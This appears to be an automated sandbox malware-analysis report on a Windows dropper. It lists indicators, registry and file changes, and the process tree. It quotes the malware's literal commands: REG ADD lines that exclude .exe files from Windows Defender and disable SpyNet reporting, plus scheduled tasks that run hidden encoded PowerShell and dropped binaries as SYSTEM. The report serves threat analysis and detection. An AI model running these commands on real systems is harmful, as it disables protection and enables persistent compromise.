Analysis
-
max time kernel
113s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-09-2022 18:11
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
40cfbca244f200fba54efdd124912b56
-
SHA1
5974c1ba38c807d1ba5b1004ef81c9a5f9b74308
-
SHA256
11249b30c522062a39e4c2e4537015995390e1b9c7d728a8aaa4ca716b4ced76
-
SHA512
99fb21f70b0787a31e0b460ce9b926743b96b3551359ca5e26cda2b2d3b003f8ce34db0e9c255237d3402890a941fe87ef80d0d2465e49fa67ab9a840e7eb8c5
-
SSDEEP
196608:91Oz+iHOkBg2EpJ/jVNmXwKJsetkf5trZXSW/sdgKH6pM:3Oz+2Oig2EptpN40f5towZ06O
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exeflow pid process 403 4560 rundll32.exe 404 4560 rundll32.exe 406 4560 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeUnPYynO.exewODCOUg.exepid process 2732 Install.exe 4172 Install.exe 1540 UnPYynO.exe 628 wODCOUg.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exewODCOUg.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation wODCOUg.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4560 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
wODCOUg.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json wODCOUg.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json wODCOUg.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json wODCOUg.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
wODCOUg.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini wODCOUg.exe -
Drops file in System32 directory 31 IoCs
Processes:
powershell.exeUnPYynO.exewODCOUg.exeInstall.exepowershell.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol UnPYynO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wODCOUg.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 wODCOUg.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies wODCOUg.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini UnPYynO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 wODCOUg.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 wODCOUg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 wODCOUg.exe -
Drops file in Program Files directory 14 IoCs
Processes:
wODCOUg.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja wODCOUg.exe File created C:\Program Files (x86)\LCSurMlfClMRC\NvkEBQv.xml wODCOUg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wODCOUg.exe File created C:\Program Files (x86)\YnFPtusxCOTU2\xwLUTHQcjGFxC.dll wODCOUg.exe File created C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\oSpMDxc.xml wODCOUg.exe File created C:\Program Files (x86)\LCSurMlfClMRC\WEXFByp.dll wODCOUg.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi wODCOUg.exe File created C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\gqsCzCN.dll wODCOUg.exe File created C:\Program Files (x86)\CXdyuXxQU\wUHcGx.dll wODCOUg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi wODCOUg.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wODCOUg.exe File created C:\Program Files (x86)\CXdyuXxQU\PqQguXe.xml wODCOUg.exe File created C:\Program Files (x86)\YnFPtusxCOTU2\jIBqKEW.xml wODCOUg.exe File created C:\Program Files (x86)\bOFQhydRtxUn\IzmAmrH.dll wODCOUg.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\GrrjjXtPjBVPFNmZQ.job schtasks.exe File created C:\Windows\Tasks\ErhcMqZyPKQzNnH.job schtasks.exe File created C:\Windows\Tasks\NSdDFfEujjmGqHjBl.job schtasks.exe File created C:\Windows\Tasks\beNJzxXkYGhzSCmkZn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2404 schtasks.exe 440 schtasks.exe 3412 schtasks.exe 5060 schtasks.exe 3988 schtasks.exe 2680 schtasks.exe 1284 schtasks.exe 452 schtasks.exe 852 schtasks.exe 3032 schtasks.exe 964 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
wODCOUg.exerundll32.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000} wODCOUg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer wODCOUg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wODCOUg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix wODCOUg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" wODCOUg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" wODCOUg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wODCOUg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" wODCOUg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket wODCOUg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" wODCOUg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" wODCOUg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe -
Suspicious behavior: EnumeratesProcesses 43 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEwODCOUg.exepid process 1132 powershell.EXE 1132 powershell.EXE 4736 powershell.exe 4736 powershell.exe 4736 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 2012 powershell.EXE 2012 powershell.EXE 2012 powershell.EXE 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe 628 wODCOUg.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 1132 powershell.EXE Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeDebugPrivilege 2012 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEUnPYynO.exepowershell.execmd.exedescription pid process target process PID 4984 wrote to memory of 2732 4984 file.exe Install.exe PID 4984 wrote to memory of 2732 4984 file.exe Install.exe PID 4984 wrote to memory of 2732 4984 file.exe Install.exe PID 2732 wrote to memory of 4172 2732 Install.exe Install.exe PID 2732 wrote to memory of 4172 2732 Install.exe Install.exe PID 2732 wrote to memory of 4172 2732 Install.exe Install.exe PID 4172 wrote to memory of 1088 4172 Install.exe forfiles.exe PID 4172 wrote to memory of 1088 4172 Install.exe forfiles.exe PID 4172 wrote to memory of 1088 4172 Install.exe forfiles.exe PID 4172 wrote to memory of 1508 4172 Install.exe forfiles.exe PID 4172 wrote to memory of 1508 4172 Install.exe forfiles.exe PID 4172 wrote to memory of 1508 4172 Install.exe forfiles.exe PID 1088 wrote to memory of 552 1088 forfiles.exe cmd.exe PID 1088 wrote to memory of 552 1088 forfiles.exe cmd.exe PID 1088 wrote to memory of 552 1088 forfiles.exe cmd.exe PID 1508 wrote to memory of 3912 1508 forfiles.exe cmd.exe PID 1508 wrote to memory of 3912 1508 forfiles.exe cmd.exe PID 1508 wrote to memory of 3912 1508 forfiles.exe cmd.exe PID 3912 wrote to memory of 4024 3912 cmd.exe reg.exe PID 3912 wrote to memory of 4024 3912 cmd.exe reg.exe PID 3912 wrote to memory of 4024 3912 cmd.exe reg.exe PID 552 wrote to memory of 3344 552 cmd.exe reg.exe PID 552 wrote to memory of 3344 552 cmd.exe reg.exe PID 552 wrote to memory of 3344 552 cmd.exe reg.exe PID 3912 wrote to memory of 2344 3912 cmd.exe reg.exe PID 3912 wrote to memory of 2344 3912 cmd.exe reg.exe PID 3912 wrote to memory of 2344 3912 cmd.exe reg.exe PID 552 wrote to memory of 2700 552 cmd.exe reg.exe PID 552 wrote to memory of 2700 552 cmd.exe reg.exe PID 552 wrote to memory of 2700 552 cmd.exe reg.exe PID 4172 wrote to memory of 2404 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 2404 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 2404 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 4108 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 4108 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 4108 4172 Install.exe schtasks.exe PID 1132 wrote to memory of 4496 1132 powershell.EXE gpupdate.exe PID 1132 wrote to memory of 4496 1132 powershell.EXE gpupdate.exe PID 4172 wrote to memory of 2544 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 2544 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 2544 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 452 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 452 4172 Install.exe schtasks.exe PID 4172 wrote to memory of 452 4172 Install.exe schtasks.exe PID 1540 wrote to memory of 4736 1540 UnPYynO.exe powershell.exe PID 1540 wrote to memory of 4736 1540 UnPYynO.exe powershell.exe PID 1540 wrote to memory of 4736 1540 UnPYynO.exe powershell.exe PID 4736 wrote to memory of 2980 4736 powershell.exe cmd.exe PID 4736 wrote to memory of 2980 4736 powershell.exe cmd.exe PID 4736 wrote to memory of 2980 4736 powershell.exe cmd.exe PID 2980 wrote to memory of 2656 2980 cmd.exe reg.exe PID 2980 wrote to memory of 2656 2980 cmd.exe reg.exe PID 2980 wrote to memory of 2656 2980 cmd.exe reg.exe PID 4736 wrote to memory of 3996 4736 powershell.exe reg.exe PID 4736 wrote to memory of 3996 4736 powershell.exe reg.exe PID 4736 wrote to memory of 3996 4736 powershell.exe reg.exe PID 4736 wrote to memory of 4708 4736 powershell.exe reg.exe PID 4736 wrote to memory of 4708 4736 powershell.exe reg.exe PID 4736 wrote to memory of 4708 4736 powershell.exe reg.exe PID 4736 wrote to memory of 4556 4736 powershell.exe reg.exe PID 4736 wrote to memory of 4556 4736 powershell.exe reg.exe PID 4736 wrote to memory of 4556 4736 powershell.exe reg.exe PID 4736 wrote to memory of 2908 4736 powershell.exe reg.exe PID 4736 wrote to memory of 2908 4736 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSB8C5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSBD2A.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goyTZnodW" /SC once /ST 02:56:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goyTZnodW"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goyTZnodW"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beNJzxXkYGhzSCmkZn" /SC once /ST 18:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\UnPYynO.exe\" Qf /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
